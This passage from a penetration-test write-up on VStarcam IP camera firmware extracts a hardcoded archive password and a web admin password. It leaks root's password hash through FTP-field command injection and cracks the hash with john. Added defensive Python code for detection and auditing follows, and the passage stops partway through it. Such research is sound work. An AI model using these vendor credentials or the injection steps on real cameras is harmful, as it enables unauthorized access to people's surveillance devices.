312141        0x4C34D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 380,  uncompressed size: 368, name: "www/images/signal4.png"
312589        0x4C50D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 369,  uncompressed size: 357, name: "www/images/signal5.png"
313026        0x4C6C2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 59,  uncompressed size: 49, name: "www/images/space.gif"
313151        0x4C73F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1004,  uncompressed size: 1302, name: "www/images/switchoff_up.gif"
314228        0x4CB74         Zip encrypted archive data, at least v2.0 to extract, compressed size: 987,  uncompressed size: 1281, name: "www/images/switchon_up.gif"
315287        0x4CF97         Zip encrypted archive data, at least v2.0 to extract, compressed size: 927,  uncompressed size: 1055, name: "www/images/vpatrol.gif"
316282        0x4D37A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 708,  uncompressed size: 884, name: "www/images/vpatrol_down.gif"
317063        0x4D687         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1154,  uncompressed size: 1401, name: "www/images/vpatrol_up.gif"
318288        0x4DB50         Zip encrypted archive data, at least v2.0 to extract, compressed size: 913,  uncompressed size: 945, name: "www/images/x1_off.gif"
319268        0x4DF24         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1257,  uncompressed size: 1290, name: "www/images/x1_on.gif"
320591        0x4E44F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 851,  uncompressed size: 876, name: "www/images/x4_off.gif"
321509        0x4E7E5         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1321,  uncompressed size: 1607, name: "www/images/x4_on.gif"
322896        0x4ED50         Zip encrypted archive data, at least v1.0 to extract, compressed size: 942,  uncompressed size: 930, name: "www/images/x9_off.gif"
323905        0x4F141         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1416,  uncompressed size: 1674, name: "www/images/x9_on.gif"
325387        0x4F70B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 539,  uncompressed size: 1030, name: "www/index.htm"
325985        0x4F961         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1920,  uncompressed size: 8471, name: "www/ip.htm"
327961        0x50119         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1378,  uncompressed size: 4199, name: "www/iphone.htm"
329399        0x506B7         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/jquery/"
329468        0x506FC         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/jquery/images/"
329544        0x50748         Zip encrypted archive data, at least v2.0 to extract, compressed size: 265,  uncompressed size: 260, name: "www/jquery/images/ui-bg_diagonals-thick_18_b81900_40x40.png"
329914        0x508BA         Zip encrypted archive data, at least v1.0 to extract, compressed size: 263,  uncompressed size: 251, name: "www/jquery/images/ui-bg_diagonals-thick_20_666666_40x40.png"
330282        0x50A2A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 114,  uncompressed size: 180, name: "www/jquery/images/ui-bg_flat_0_aaaaaa_40x100.png"
330490        0x50AFA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 112,  uncompressed size: 178, name: "www/jquery/images/ui-bg_flat_10_000000_40x100.png"
330697        0x50BC9         Zip encrypted archive data, at least v2.0 to extract, compressed size: 112,  uncompressed size: 178, name: "www/jquery/images/ui-bg_flat_75_ffffff_40x100.png"
330904        0x50C98         Zip encrypted archive data, at least v2.0 to extract, compressed size: 114,  uncompressed size: 104, name: "www/jquery/images/ui-bg_glass_100_f6f6f6_1x400.png"
331114        0x50D6A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 132,  uncompressed size: 125, name: "www/jquery/images/ui-bg_glass_100_fdf5ce_1x400.png"
331342        0x50E4E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 131,  uncompressed size: 120, name: "www/jquery/images/ui-bg_glass_55_fbf9ee_1x400.png"
331568        0x50F30         Zip encrypted archive data, at least v2.0 to extract, compressed size: 115,  uncompressed size: 105, name: "www/jquery/images/ui-bg_glass_65_ffffff_1x400.png"
331778        0x51002         Zip encrypted archive data, at least v2.0 to extract, compressed size: 121,  uncompressed size: 111, name: "www/jquery/images/ui-bg_glass_75_dadada_1x400.png"
331994        0x510DA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 120,  uncompressed size: 110, name: "www/jquery/images/ui-bg_glass_75_e6e6e6_1x400.png"
332209        0x511B1         Zip encrypted archive data, at least v2.0 to extract, compressed size: 130,  uncompressed size: 119, name: "www/jquery/images/ui-bg_glass_95_fef1ec_1x400.png"
332434        0x51292         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3576,  uncompressed size: 3762, name: "www/jquery/images/ui-bg_gloss-wave_35_f6a828_500x100.png"
336112        0x520F0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 99,  uncompressed size: 90, name: "www/jquery/images/ui-bg_highlight-soft_100_eeeeee_1x100.png"
336316        0x521BC         Zip encrypted archive data, at least v2.0 to extract, compressed size: 110,  uncompressed size: 101, name: "www/jquery/images/ui-bg_highlight-soft_75_cccccc_1x100.png"
336530        0x52292         Zip encrypted archive data, at least v2.0 to extract, compressed size: 140,  uncompressed size: 129, name: "www/jquery/images/ui-bg_highlight-soft_75_ffe45c_1x100.png"
336774        0x52386         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4152,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_222222_256x240.png"
341017        0x53419         Zip encrypted archive data, at least v2.0 to extract, compressed size: 5179,  uncompressed size: 5355, name: "www/jquery/images/ui-icons_228ef1_256x240.png"
346287        0x548AF         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_2e83ff_256x240.png"
350529        0x55941         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_454545_256x240.png"
354771        0x569D3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_888888_256x240.png"
359013        0x57A65         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_cd0a0a_256x240.png"
363255        0x58AF7         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_ef8c08_256x240.png"
367497        0x59B89         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4152,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_ffd27a_256x240.png"
371740        0x5AC1C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_ffffff_256x240.png"
375982        0x5BCAE         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4206,  uncompressed size: 22938, name: "www/jquery/jquery-ui-1.8.18.custom.css"
380272        0x5CD70         Zip encrypted archive data, at least v2.0 to extract, compressed size: 7539,  uncompressed size: 27218, name: "www/jquery/jquery-ui-1.8.18.custom.min.js"
387898        0x5EB3A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 33625,  uncompressed size: 94843, name: "www/jquery/jquery.min.js"
421593        0x66ED9         Zip encrypted archive data, at least v2.0 to extract, compressed size: 7855,  uncompressed size: 31770, name: "www/jquery/meioMask.js"
429516        0x68DCC         Zip encrypted archive data, at least v2.0 to extract, compressed size: 132400,  uncompressed size: 149040, name: "www/linkfail.wav"
561978        0x8933A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 81259,  uncompressed size: 92720, name: "www/linking.wav"
643298        0x9D0E2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 88942,  uncompressed size: 97664, name: "www/linksuccess.wav"
732305        0xB2C91         Zip encrypted archive data, at least v2.0 to extract, compressed size: 783,  uncompressed size: 1581, name: "www/live.htm"
733146        0xB2FDA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 795,  uncompressed size: 1719, name: "www/log.htm"
733998        0xB332E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1830,  uncompressed size: 7813, name: "www/login.htm"
735887        0xB3A8F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 42,  uncompressed size: 31, name: "www/logo.js"
735986        0xB3AF2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1857,  uncompressed size: 7447, name: "www/mail.htm"
737901        0xB426D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 69,  uncompressed size: 69, name: "www/mime.types"
738030        0xB42EE         Zip encrypted archive data, at least v2.0 to extract, compressed size: 31123,  uncompressed size: 34856, name: "www/mls.wav"
769210        0xBBCBA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 11055,  uncompressed size: 64215, name: "www/monitor.htm"
780326        0xBE826         Zip encrypted archive data, at least v2.0 to extract, compressed size: 7280,  uncompressed size: 42747, name: "www/monitor2.htm"
787668        0xC04D4         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3964,  uncompressed size: 30410, name: "www/multidev.htm"
791694        0xC148E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3559,  uncompressed size: 28945, name: "www/multidev2.htm"
795316        0xC22B4         Zip encrypted archive data, at least v2.0 to extract, compressed size: 102,  uncompressed size: 127, name: "www/oem.js"
795474        0xC2352         Zip encrypted archive data, at least v1.0 to extract, compressed size: 20,  uncompressed size: 8, name: "www/oem.txt"
795551        0xC239F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1200,  uncompressed size: 3859, name: "www/pda.htm"
796808        0xC2888         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1290,  uncompressed size: 4992, name: "www/ptz.htm"
798155        0xC2DCB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1077,  uncompressed size: 3336, name: "www/public.js"
799291        0xC323B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 535,  uncompressed size: 1138, name: "www/reboot.htm"
799886        0xC348E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 337,  uncompressed size: 535, name: "www/rebootme.htm"
800285        0xC361D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1216,  uncompressed size: 4169, name: "www/recordpath.htm"
801565        0xC3B1D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2760,  uncompressed size: 9013, name: "www/recordplay.htm"
804389        0xC4625         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1961,  uncompressed size: 6499, name: "www/recordplay2.htm"
806415        0xC4E0F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3288,  uncompressed size: 13366, name: "www/recordsch.htm"
809766        0xC5B26         Zip encrypted archive data, at least v2.0 to extract, compressed size: 105533,  uncompressed size: 118284, name: "www/resetok.wav"
915360        0xDF7A0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 285,  uncompressed size: 427, name: "www/rowscolor.js"
915707        0xDF8FB         Zip encrypted archive data, at least v1.0 to extract, compressed size: 188,  uncompressed size: 176, name: "www/sensordata.bin"
915959        0xDF9F7         Zip encrypted archive data, at least v2.0 to extract, compressed size: 927,  uncompressed size: 2794, name: "www/setddns.htm"
916947        0xDFDD3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 781,  uncompressed size: 2340, name: "www/setstep.htm"
917789        0xE011D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 997,  uncompressed size: 2217, name: "www/setuid.htm"
918846        0xE053E         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/simple_chinese/"
918923        0xE058B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 225,  uncompressed size: 461, name: "www/simple_chinese/oem.js"
919219        0xE06B3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 11293,  uncompressed size: 31404, name: "www/simple_chinese/string.js"
930586        0xE331A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 389,  uncompressed size: 719, name: "www/snapshot.htm"
931037        0xE34DD         Zip encrypted archive data, at least v2.0 to extract, compressed size: 27,  uncompressed size: 32, name: "www/sotfLimitParam.ini"
931132        0xE353C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1499,  uncompressed size: 5753, name: "www/status.htm"
932691        0xE3B53         Zip encrypted archive data, at least v2.0 to extract, compressed size: 892,  uncompressed size: 4302, name: "www/style.css"
933642        0xE3F0A         Zip encrypted archive data, at least v1.0 to extract, compressed size: 14,  uncompressed size: 2, name: "www/test.txt"
933714        0xE3F52         Zip encrypted archive data, at least v2.0 to extract, compressed size: 516,  uncompressed size: 1441, name: "www/test_ftp.htm"
934292        0xE4194         Zip encrypted archive data, at least v2.0 to extract, compressed size: 524,  uncompressed size: 1462, name: "www/test_mail.htm"
934879        0xE43DF         Zip encrypted archive data, at least v2.0 to extract, compressed size: 145,  uncompressed size: 188, name: "www/unauth.htm"
935084        0xE44AC         Zip encrypted archive data, at least v2.0 to extract, compressed size: 826,  uncompressed size: 2513, name: "www/upgrade.htm"
935971        0xE4823         Zip encrypted archive data, at least v2.0 to extract, compressed size: 841,  uncompressed size: 2009, name: "www/upnp.htm"
936870        0xE4BA6         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1355,  uncompressed size: 5074, name: "www/user.htm"
938283        0xE512B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 92024,  uncompressed size: 102860, name: "www/vfaile.wav"
1030367       0xFB8DF         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/video.cab"
1030438       0xFB926         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/video.exe"
1030509       0xFB96D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1504,  uncompressed size: 8824, name: "www/video.htm"
1032072       0xFBF88         Zip encrypted archive data, at least v2.0 to extract, compressed size: 92722,  uncompressed size: 103604, name: "www/vwificonfig.wav"
1124859       0x1129FB        Zip encrypted archive data, at least v2.0 to extract, compressed size: 94398,  uncompressed size: 102768, name: "www/wificonfig.wav"
1219321       0x129AF9        Zip encrypted archive data, at least v2.0 to extract, compressed size: 2748,  uncompressed size: 11609, name: "www/wireless.htm"
1235916       0x12DBCC        End of Zip archive

The zip files are password protected.
Another way to check :

> unzip CH-app-EN53.8.1.13_VSTARCAM.bin
Archive:  CH-app-EN53.8.1.13_VSTARCAM.bin
warning [CH-app-EN53.8.1.13_VSTARCAM.bin]:  36 extra bytes at beginning or within zipfile
  (attempting to process anyway)
[CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password:
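What both tools read to decide that an entry is encrypted, shown as an added example that is not part of the original article: a scanner for ZIP local file headers that tolerates leading bytes before the archive. The sample blob is constructed (36 zero bytes of filler, then two header-only entries with dummy payloads); `scan_local_headers` and `crypt_overhead` are hypothetical names.

```python
import struct

# ZIP local file header: signature, version needed, flags, method,
# mod time, mod date, CRC-32, compressed size, uncompressed size,
# name length, extra length (30 bytes, little-endian).
LFH = struct.Struct("<4sHHHHHIIIHH")
SIG = b"PK\x03\x04"
ENCRYPTED = 0x0001      # general-purpose flag bit 0
CRYPT_HEADER = 12       # traditional ZIP encryption prepends 12 bytes


def scan_local_headers(blob):
    """Find local file headers anywhere in blob, skipping leading data."""
    entries, pos = [], 0
    while True:
        pos = blob.find(SIG, pos)
        if pos < 0 or pos + LFH.size > len(blob):
            return entries
        (_sig, ver, flags, method, _time, _date, _crc,
         csize, usize, nlen, xlen) = LFH.unpack_from(blob, pos)
        name_start = pos + LFH.size
        name = blob[name_start:name_start + nlen].decode("cp437")
        ver &= 0xFF
        entries.append({
            "offset": pos,
            "needs": f"v{ver // 10}.{ver % 10}",
            "encrypted": bool(flags & ENCRYPTED),
            "method": method,
            "csize": csize,
            "usize": usize,
            "name": name,
        })
        # Jump over name, extra field and payload so that payload bytes
        # are never mistaken for another header signature.
        pos = name_start + nlen + xlen + csize


def crypt_overhead(entry):
    """For stored (method 0) encrypted entries, bytes added by encryption."""
    if entry["encrypted"] and entry["method"] == 0:
        return entry["csize"] - entry["usize"]
    return None


def _entry(name, ver, flags, method, payload, usize):
    raw = name.encode("ascii")
    return LFH.pack(SIG, ver, flags, method, 0, 0, 0,
                    len(payload), usize, len(raw), 0) + raw + payload


# Constructed sample: 36 filler bytes, an encrypted directory entry and an
# encrypted stored file with the sizes listed above for www/oem.txt.
SAMPLE = (bytes(36)
          + _entry("www/", 10, ENCRYPTED, 0, bytes(CRYPT_HEADER), 0)
          + _entry("www/oem.txt", 10, ENCRYPTED, 0, bytes(20), 8))

if __name__ == "__main__":
    for e in scan_local_headers(SAMPLE):
        state = "encrypted" if e["encrypted"] else "plain"
        print(f'{e["offset"]:<8} {state}, at least {e["needs"]} to extract, '
              f'compressed size: {e["csize"]}, name: "{e["name"]}"')
```

The 12-byte difference returned by `crypt_overhead` is consistent with the listing above, where directories show a compressed size of 12 and stored files such as `www/oem.txt` are 12 bytes larger than their uncompressed size.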

The easiest way is to go back to the firmware folder and look for the unzipping password :

> cd ../firmware/_CH-sys-48.53.64.67.bin.extracted/

And use the same method that we used to find the root password. Look for any unzip command in files :

> grep -r "unzip" .
Binary file ./system/system/bin/updata matches
Binary file ./system/system/bin/wifidaemon matches
Binary file ./system/system/bin/encoder matches

And check in the updata file for the password :

> strings system/system/bin/updata | grep -A 1 -B 1 unzip
cp /tmp/network-b.ini /system/www/network-b.ini
unzip www is start...
/system/system/bin/unzip1 -o -P vstarcam!@#$%  /tmp/www.zip -d /system  > /tmp/app.txt
unzip www is end
rm /tmp/www.zip

Unzipping password : vstarcam!@#$% (better than 123456 by the way !).

Let’s go back to WebUI unzipping :

> cd ../../webui/

And use the previous password to unzip the file :

> unzip CH-app-EN53.8.1.13_VSTARCAM.bin
Archive:  CH-app-EN53.8.1.13_VSTARCAM.bin
warning [CH-app-EN53.8.1.13_VSTARCAM.bin]:  36 extra bytes at beginning or within zipfile
  (attempting to process anyway)
[CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password:
   creating: www/
  inflating: www/admin.htm
  inflating: www/admin2.htm
  inflating: www/alarm.htm
  inflating: www/alarm.pcm
  inflating: www/alias.htm
  inflating: www/ap.htm
 extracting: www/appver.js
  inflating: www/audio.htm
  inflating: www/audioparam.bin
  inflating: www/datetime.htm
  inflating: www/ddns.htm
  inflating: www/dns.htm
   creating: www/english/
  inflating: www/english/oem.js
  inflating: www/english/string.js
  inflating: www/ftp.htm
  inflating: www/functions.htm
   creating: www/images/
 extracting: www/images/2_10.gif
  inflating: www/images/2_11.gif
  inflating: www/images/2_13.gif
 extracting: www/images/2_16.gif
 extracting: www/images/2_17.gif
  inflating: www/images/2_19.gif
 extracting: www/images/2_20.gif
 extracting: www/images/2_27.gif
  inflating: www/images/2_item.gif
  inflating: www/images/333.gif
  inflating: www/images/alarm.gif
  inflating: www/images/alarm.wav
  inflating: www/images/alert.gif
  inflating: www/images/autopos.gif
 extracting: www/images/back.gif
  inflating: www/images/bg.png
  inflating: www/images/bg_right.jpg
  inflating: www/images/btn_circle.gif
  inflating: www/images/btn_jianting.gif
  inflating: www/images/btn_jianting_on.gif
  inflating: www/images/btn_luxiang.gif
  inflating: www/images/btn_luxiang_on.gif
 extracting: www/images/btn_paizhao.gif
 extracting: www/images/btn_shezhi.gif
  inflating: www/images/btn_talk.gif
  inflating: www/images/btn_talk_on.gif
 extracting: www/images/CD.gif
 extracting: www/images/client.gif
  inflating: www/images/clr_bright.gif
  inflating: www/images/clr_contast.gif
  inflating: www/images/clr_hue.gif
  inflating: www/images/clr_saturation.gif
  inflating: www/images/del.gif
  inflating: www/images/download.gif
  inflating: www/images/elogo.gif
 extracting: www/images/firefox.gif
  inflating: www/images/green.gif
  inflating: www/images/hpatrol.gif
 extracting: www/images/hpatrol_down.gif
  inflating: www/images/hpatrol_up.gif
 extracting: www/images/IE.gif
  inflating: www/images/index_bg.gif
 extracting: www/images/iphone.gif
  inflating: www/images/ir0.gif
  inflating: www/images/ir1.gif
  inflating: www/images/line.gif
  inflating: www/images/logo.gif
  inflating: www/images/logo1.gif
 extracting: www/images/logo2.gif
  inflating: www/images/mirror.gif
  inflating: www/images/mirror_on.gif
 extracting: www/images/modellogo.gif
  inflating: www/images/nav-1.gif
  inflating: www/images/nav.gif
  inflating: www/images/network.gif
  inflating: www/images/no.gif
  inflating: www/images/ok.gif
  inflating: www/images/option.gif
 extracting: www/images/osd01.gif
 extracting: www/images/osd02.gif
  inflating: www/images/p.gif
 extracting: www/images/pan_1.gif
 extracting: www/images/pan_2.gif
 extracting: www/images/pan_3.gif
 extracting: www/images/pan_4.gif
 extracting: www/images/phone.gif
 extracting: www/images/playback.gif
  inflating: www/images/ptz_19.gif
  inflating: www/images/ptz_24.gif
  inflating: www/images/ptz_26.gif
  inflating: www/images/ptz_29.gif
  inflating: www/images/ptz_34.gif
  inflating: www/images/pt_speed.gif
 extracting: www/images/rec.gif
  inflating: www/images/record.gif
  inflating: www/images/red.gif
  inflating: www/images/reversal.gif
  inflating: www/images/reversal_on.gif
 extracting: www/images/signal0.png
 extracting: www/images/signal1.png
 extracting: www/images/signal2.png
 extracting: www/images/signal3.png
 extracting: www/images/signal4.png
 extracting: www/images/signal5.png
  inflating: www/images/space.gif
  inflating: www/images/switchoff_up.gif
  inflating: www/images/switchon_up.gif
  inflating: www/images/vpatrol.gif
  inflating: www/images/vpatrol_down.gif
  inflating: www/images/vpatrol_up.gif
  inflating: www/images/x1_off.gif
  inflating: www/images/x1_on.gif
  inflating: www/images/x4_off.gif
  inflating: www/images/x4_on.gif
 extracting: www/images/x9_off.gif
  inflating: www/images/x9_on.gif
  inflating: www/index.htm
  inflating: www/ip.htm
  inflating: www/iphone.htm
   creating: www/jquery/
   creating: www/jquery/images/
  inflating: www/jquery/images/ui-bg_diagonals-thick_18_b81900_40x40.png
 extracting: www/jquery/images/ui-bg_diagonals-thick_20_666666_40x40.png
  inflating: www/jquery/images/ui-bg_flat_0_aaaaaa_40x100.png
  inflating: www/jquery/images/ui-bg_flat_10_000000_40x100.png
  inflating: www/jquery/images/ui-bg_flat_75_ffffff_40x100.png
  inflating: www/jquery/images/ui-bg_glass_100_f6f6f6_1x400.png
  inflating: www/jquery/images/ui-bg_glass_100_fdf5ce_1x400.png
  inflating: www/jquery/images/ui-bg_glass_55_fbf9ee_1x400.png
  inflating: www/jquery/images/ui-bg_glass_65_ffffff_1x400.png
  inflating: www/jquery/images/ui-bg_glass_75_dadada_1x400.png
  inflating: www/jquery/images/ui-bg_glass_75_e6e6e6_1x400.png
  inflating: www/jquery/images/ui-bg_glass_95_fef1ec_1x400.png
  inflating: www/jquery/images/ui-bg_gloss-wave_35_f6a828_500x100.png
  inflating: www/jquery/images/ui-bg_highlight-soft_100_eeeeee_1x100.png
  inflating: www/jquery/images/ui-bg_highlight-soft_75_cccccc_1x100.png
  inflating: www/jquery/images/ui-bg_highlight-soft_75_ffe45c_1x100.png
  inflating: www/jquery/images/ui-icons_222222_256x240.png
  inflating: www/jquery/images/ui-icons_228ef1_256x240.png
  inflating: www/jquery/images/ui-icons_2e83ff_256x240.png
  inflating: www/jquery/images/ui-icons_454545_256x240.png
  inflating: www/jquery/images/ui-icons_888888_256x240.png
  inflating: www/jquery/images/ui-icons_cd0a0a_256x240.png
  inflating: www/jquery/images/ui-icons_ef8c08_256x240.png
  inflating: www/jquery/images/ui-icons_ffd27a_256x240.png
  inflating: www/jquery/images/ui-icons_ffffff_256x240.png
  inflating: www/jquery/jquery-ui-1.8.18.custom.css
  inflating: www/jquery/jquery-ui-1.8.18.custom.min.js
  inflating: www/jquery/jquery.min.js
  inflating: www/jquery/meioMask.js
  inflating: www/linkfail.wav
  inflating: www/linking.wav
  inflating: www/linksuccess.wav
  inflating: www/live.htm
  inflating: www/log.htm
  inflating: www/login.htm
  inflating: www/logo.js
  inflating: www/mail.htm
  inflating: www/mime.types
  inflating: www/mls.wav
  inflating: www/monitor.htm
  inflating: www/monitor2.htm
  inflating: www/multidev.htm
  inflating: www/multidev2.htm
  inflating: www/oem.js
 extracting: www/oem.txt
  inflating: www/pda.htm
  inflating: www/ptz.htm
  inflating: www/public.js
  inflating: www/reboot.htm
  inflating: www/rebootme.htm
  inflating: www/recordpath.htm
  inflating: www/recordplay.htm
  inflating: www/recordplay2.htm
  inflating: www/recordsch.htm
  inflating: www/resetok.wav
  inflating: www/rowscolor.js
 extracting: www/sensordata.bin
  inflating: www/setddns.htm
  inflating: www/setstep.htm
  inflating: www/setuid.htm
   creating: www/simple_chinese/
  inflating: www/simple_chinese/oem.js
  inflating: www/simple_chinese/string.js
  inflating: www/snapshot.htm
  inflating: www/sotfLimitParam.ini
  inflating: www/status.htm
  inflating: www/style.css
 extracting: www/test.txt
  inflating: www/test_ftp.htm
  inflating: www/test_mail.htm
  inflating: www/unauth.htm
  inflating: www/upgrade.htm
  inflating: www/upnp.htm
  inflating: www/user.htm
  inflating: www/vfaile.wav
 extracting: www/video.cab
 extracting: www/video.exe
  inflating: www/video.htm
  inflating: www/vwificonfig.wav
  inflating: www/wificonfig.wav
  inflating: www/wireless.htm

Done !

4.3 Method 3 : Injection

Thanks to this article, we know that the system interprets the FTP user, so proceed as follows :
[Image : injection-form]

Save and proceed to a “test”. Then monitor the FTP server logs :

FTP session opened.
USER root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh: no such user found from 192.168.1.16 [192.168.1.16] to ::ffff:192.168.1.15:21
2FTP session closed.

So the hashed password for the root user is : LSiuY7pOmZG2s. As already mentioned, it is easy to crack :

> echo "root:LSiuY7pOmZG2s" > password.txt
> john password.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
123456           (root)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 17680  trying: 12345 - biteme
Use the "--show" option to display all of the cracked passwords reliably
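Seen from the FTP server side, the log line above is a strong detection signal: a USER value shaped like an `/etc/passwd` entry. The following is an added example, not part of the original article, that flags such lines and classifies the leaked hash scheme without copying the hash into the alert. Only the `root:...` line is taken from the article; the other log lines, the account-name allow-list and all function names are constructed assumptions.

```python
import re

# Failure line format as it appears in the article's FTP server log.
FAILED_USER = re.compile(
    r"USER (?P<user>.+?): no such user found from \S+ \[(?P<src>[^\]]+)\]")
# passwd(5): name:password:UID:GID:GECOS:home:shell
PASSWD_ENTRY = re.compile(
    r"(?P<name>[^:\s]+):(?P<pw>[^:]*):(?P<uid>\d+):(?P<gid>\d+):"
    r"[^:]*:(?P<home>/[^:]*):(?P<shell>/[^:\s]*)")
# Allow-list for plausible account names (an assumption; tune per site).
ACCOUNT_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.@-]{0,63}")

WEAK_SCHEMES = {"descrypt", "md5crypt", "empty"}


def hash_scheme(pw):
    """Classify the password field of a passwd entry by its format."""
    if pw == "":
        return "empty"
    if pw in ("x", "*") or pw.startswith("!"):
        return "shadowed-or-locked"
    for prefix, name in (("$1$", "md5crypt"), ("$5$", "sha256crypt"),
                         ("$6$", "sha512crypt"), ("$2", "bcrypt")):
        if pw.startswith(prefix):
            return name
    # Traditional DES crypt: 2 salt characters + 11 hash characters,
    # and only the first 8 characters of the password are used.
    if re.fullmatch(r"[./0-9A-Za-z]{13}", pw):
        return "descrypt"
    return "unknown"


def analyze(lines):
    """Return one alert per failed login whose USER is not an account name."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = FAILED_USER.search(line)
        if not m:
            continue
        user, src = m["user"], m["src"]
        entry = PASSWD_ENTRY.search(user)
        if entry:
            scheme = hash_scheme(entry["pw"])
            alerts.append({
                "line": lineno, "src": src, "kind": "passwd-entry-in-USER",
                "account": entry["name"], "uid": int(entry["uid"]),
                "hash_scheme": scheme, "weak": scheme in WEAK_SCHEMES,
            })
        elif not ACCOUNT_NAME.fullmatch(user):
            alerts.append({"line": lineno, "src": src,
                           "kind": "non-account-name-in-USER"})
    return alerts


# Line 5 is the log line from the article; the rest is constructed.
SAMPLE_LOG = """\
FTP session opened.
USER backup: no such user found from 192.168.1.20 [192.168.1.20] to ::ffff:192.168.1.15:21
FTP session closed.
FTP session opened.
USER root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh: no such user found from 192.168.1.16 [192.168.1.16] to ::ffff:192.168.1.15:21
FTP session closed.
USER uid=0(root) gid=0(root): no such user found from 192.168.1.16 [192.168.1.16] to ::ffff:192.168.1.15:21
""".splitlines()

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```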

5. Web interface penetration test

Initiate a telnet connection to the camera using the credentials found earlier.
Then it’s easy to find the web interface password :

> find -name "*.cgi"
./system/param/login.cgi

> strings system/param/login.cgi | grep -A 1 -B 1 pass
var loginuser="admin";
var loginpass="erocgfhruehgi3ureozkfx";
var pri=255;
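The unzip password in `updata` and the `loginpass` variable in `login.cgi` are the same class of finding: a secret stored in clear inside the firmware image. The following added example, not part of the original article or the vendor's code, is a check a firmware build could run over an extracted tree before release. The rule patterns and function names are assumptions, and the sample bytes are constructed from the strings shown in the article.

```python
import os
import re

# Runs of 4+ printable ASCII bytes, the default threshold of strings(1).
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")

# Rule patterns are assumptions modelled on the article's findings.
RULES = [
    ("archive-password-on-command-line",
     re.compile(r"\bunzip\w*\s(?:.*?\s)?-P\s+(\S+)")),
    ("credential-assigned-in-script",
     re.compile(r"\b\w*pass\w*\s*=\s*\"([^\"]+)\"", re.IGNORECASE)),
    ("passwd-entry-with-inline-hash",
     re.compile(r"\b[\w.-]+:([./0-9A-Za-z]{13}):\d+:\d+:")),
]


def extract_strings(blob):
    """Equivalent of strings(1): printable runs found in binary data."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(blob)]


def audit_blob(name, blob):
    """Return a finding for every string in blob that matches a rule."""
    findings = []
    for text in extract_strings(blob):
        for rule, pattern in RULES:
            m = pattern.search(text)
            if m:
                findings.append({"file": name, "rule": rule,
                                 "value": m.group(1)})
    return findings


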